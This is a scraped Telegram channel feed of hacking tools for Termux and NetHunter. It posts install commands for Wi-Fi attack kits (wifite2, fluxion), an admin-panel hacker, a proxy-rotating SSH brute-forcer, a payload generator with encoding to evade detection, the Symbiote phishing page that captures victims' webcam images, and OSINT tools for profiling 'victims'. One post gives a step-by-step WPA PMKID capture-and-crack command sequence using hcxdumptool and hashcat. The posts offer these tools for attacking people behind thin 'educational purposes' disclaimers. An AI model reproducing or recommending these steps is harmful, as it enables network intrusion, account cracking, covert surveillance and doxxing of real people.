Termux
2.19K subscribers
670 photos
83 videos
407 files
739 links
Termux-Collection
Download Telegram
ΒΆΒΆMailFinder
#osint
OSINT tool for finding email by first and last name

apt update
apt upgrade
apt install git
apt install python
pip3 install requests
git clone https://github.com/mishakorzik/MailFinder
cd MailFinder
python MailFinder.py
πŸ‘Œ1
ADMINHACK
will hack the admin panel of the site.

Installing for termux
pkg upgrade
pkg update
pkg install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh

Everything is ready! Now we are waiting for everything to download!

succes

Installing for linux
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh

Start Program
Enter a command to start AdminHack
bash AdminHack.sh

Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.
❀2πŸ‘1
wifite2.zip
1.9 MB
Current version: 2.6.9
#update #wifite #nethunter


installation:-

cp $(find /sdcard/Download -name wifite2.zip) ./ ;unzip wifite2.zip;rm -rf wifite2.zip;cd wifite2;ls

sudo python3 setup.py install

cp wordlist-probable.txt /usr/share/dict



required packages:

make deps

make hcxtools

make hcxdumptool

make bully

make reaver


make hashcat
❀3πŸ‘1
Complete Linux Training Course


Download link-
https://drive.google.com/drive/folders/1-is9JovkcB4gjnNRMhtX5AsB2lyxOaVp


Don't Forget To React

ᴊᴏΙͺΙ΄ κœ°α΄Κ€ ᴍᴏʀᴇ β€Ί
@hackingcourses07
❀1πŸ‘1
Forwarded from Emilia
πŸ‘5
Termux
wifite2.zip
Media is too big
VIEW IN TELEGRAM
nethunter on (Samsung note9 )
Monitor mode & packet injection works
HID= Not working
USB: 2/3
realtek /mediatek / and atheros adapters works
includes : alfa adapters if you have a samsung note9 rooted
DM only if you have samsung note9 V=9 and V=11

RTL8192EU
RTL8188EUS
RTL8812AU
Mediatek = MT7601U
Atheros AR9271
#wifite2 #wps #wpa #wpa2 #hashcat
πŸ‘3❀1
Media is too big
VIEW IN TELEGRAM
#nethunter #wifihacking #wpa #wpa2
#androidtools #TermuxToolx #pmkidhashcrack #pmkid #hashcat #samsungnote9 #android #gpu

ΒΆΒΆhttps://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick

COMMANDS //

πŸ“sudo systemctl stop NetworkManager.service

πŸ“sudo systemctl stop wpa_supplicant.service

πŸ“sudo hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15

πŸ“sudo systemctl start wpa_supplicant.service

πŸ“sudo systemctl start NetworkManager.service

πŸ“hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng

πŸ“hashcat -m 22000 hash.hc22000 wordlist.txt

ΒΆΒΆ Windows:
πŸ“hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

πŸ“hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 14 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d
πŸ‘4πŸ‘Œ2
Skiptracer - OSINT scraping framework

Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.

Installation

$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer

Install requirements

$ pip install -r requirements.txt

Run

$ python skiptracer.py -l (phone|email|sn|name|plate)

The modules will allow queries for the following:
- Phone
- Email
- Screen names
- Real names
- Addresses
- IP
- Hostname
- Breach Credentials

Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.

https://gitlab.com/illwill/skiptracer
πŸ‘4❀1
fluxion.zip
11.1 MB
☰☲☷ FLU [X] I0N ☰☲☷
                ☲  WI-FI ☲
                     Ver: 6.9


Installation:-

cp $(find /sdcard/Download -name fluxion.zip) ./;unzip fluxion.zip && rm -rf fluxion.zip;cd fluxion;mv fluxion /usr/bin;chmod 755 /usr/bin/fluxion;cd .. && mv fluxion /usr/share


Howto? (make sure to run user interface in vnc/kex as root)

Now you can just type fluxion and done ;)
πŸ‘2
Orbitaldump:-- A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python.
When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Usages:-

https://github.com/k4yt3x/orbitaldump


Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.

Facebook Page:-

https://www.facebook.com/ZeroDayExploitware
❀2πŸ‘1
ΒΆΒΆ waf-bypass
Check your WAF before an attacker does

WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.

πŸ“git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
πŸ“python3 -m pip install -r /opt/waf-bypass/requirements.txt
πŸ“python3 /opt/waf-bypass/main.py --host='example.com'
πŸ‘1
ΒΆΒΆ Beta_Nicco
An advance payload generation tool which automates your payload creation work. It also features some feature like ;-

sudo apt-get update && sudo apt-get upgrade -y
πŸ“git clone https://github.com/empath1928/Beta_Nicco
πŸ“cd Beta_Nicco
πŸ“ls
πŸ“chmod +x setup.sh
πŸ“./setup.sh OR bash setup.sh

[ 1 ] ---> Payload for any platform
[ 2 ] ---> Encoding the payload for aviation
[ 3 ] ---> Auto listner as well as Custom for easy process
❀1πŸ‘1
ΒΆΒΆ INFO-X
Info-X is a information gathering tool...with this tool You can get vectims like ip , gmail , phone number information
#osint #info #ip #phonenumber

πŸ“pkg update
πŸ“pkg upgrade
πŸ“pkg install python
πŸ“pkg install git
πŸ“pip install requests
πŸ“pip install bs4
πŸ“pip install futures
πŸ“pip install mechanize
πŸ“cd $HOME
πŸ“rm -rf INFO-X
πŸ“git clone --depth=1 https://github.com/U7P4L-IN/INFO-X.git
πŸ“cd INFO-X
πŸ“python INFO.py

[01] Track IP Address
[02] Phone Number Info
[03] E-Mail Info
[04] More Tools
[05] Contract Me
[00] Exit
πŸ‘11❀6
ΒΆΒΆ https://osintframework.com/

OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
#osint

------------------------
Documentation
OpSec
Threat Intelligence
Exploits & Advisories
Malicious File Analysis
Tools
Encoding / Decoding
Classifieds
Digital Currency
Dark Web
Terrorism
Mobile Emulation
Metadata
Language Translation
Archives
Forums / Blogs / IRC
Search Engines
Geolocation Tools / Maps
Transportation
Business Records
Public Records
Telephone Numbers
Dating
People Search Engines
Instant Messaging
Social Networks
Images / Videos / Docs
IP Address
Domain Name
ΒΆΒΆ tidos-framework
The Offensive Manual Web Application Penetration Testing Framework. #recon #kalitools #nethunter


πŸ“git clone https://github.com/0xinfection/tidos-framework.git
πŸ“cd tidos-framework

πŸ“sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python3-pip libmariadbclient18 libmysqlclient-dev tor konsole

πŸ“pip3 install -r requirements.txt
πŸ“sudo python3 tidconsole.py
πŸ“sudo git pull ( to update to latest )

ΒΆΒΆ need to set your own API KEYS for various OSINT & Scanning and Enumeration purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS.


ΒΆΒΆ Comands
πŸ“list all
  -----
  aid
  infdisc
  osint-active
  osint-passive
  post
  scan
  sploit
  vlnysis

πŸ“load  or load all ( or list all )
πŸ“vicdel all (remove all added url)
πŸ“vicadd (after that url  example google.com)
πŸ“info
πŸ“attack

ΒΆΒΆ Youtube link : https://youtu.be/8SZXnhCvUXc
πŸ‘4❀1
ΒΆΒΆ symbiote
Symbiote is a social engineering tool designed to create a phishing page and capture webcam images. IP / Device Details By requesting camera permission on the victim's device,
#ip #device #info #browser #phishing #camera #seeker #vidphisher #storm-breaker #ngrok #localhost

πŸ“sudo apt update && upgrade
πŸ“sudo apt install python -y
πŸ“sudo apt install wget -y
πŸ“sudo apt install php -y
πŸ“sudo apt install openssh-client -y
πŸ“sudo apt install jq -y
πŸ“sudo ssh-keygen -q -t rsa -N '' -f ~/.ssh/id_rsa <<<y >/dev/null 2>&1

πŸ“git clone https://github.com/hasanfirnas/symbiote
πŸ“cd symbiote
πŸ“python3 symbiote.py
πŸ“cd Server
πŸ“./loclx account login
now enter your access token from https://localxpose.io/



ΒΆΒΆ To check for cam file :
πŸ“cd symbiote
πŸ“cd CapturedData
πŸ“ls
πŸ“termux-open <file_name>

ΒΆΒΆ Youtube link :
https://youtu.be/j8rTc3CI7UA
❀6πŸ‘3
ΒΆΒΆ SWS-Recon-Tool
SWS-Recon is a Python Tool designed to performed Reconnaissance on the given target website- Domain or SubDomain. SWS-Recon collects information such as Google Dork, DNS Information, Sub Domains, PortScan, Subdomain takeovers, Reconnaissance On Github and much more vulnerability scan. #recon #osint #info #nethunter


πŸ“sudo apt-get install libxml2-dev libxslt-dev
πŸ“git clone https://github.com/ShobhitMishra-bot/SWS-Recon-Tool.git
πŸ“cd SWS-Recon-Tool
πŸ“pip3 install -r requirements.txt
πŸ“python3 SWS-Recon.py -h
πŸ‘3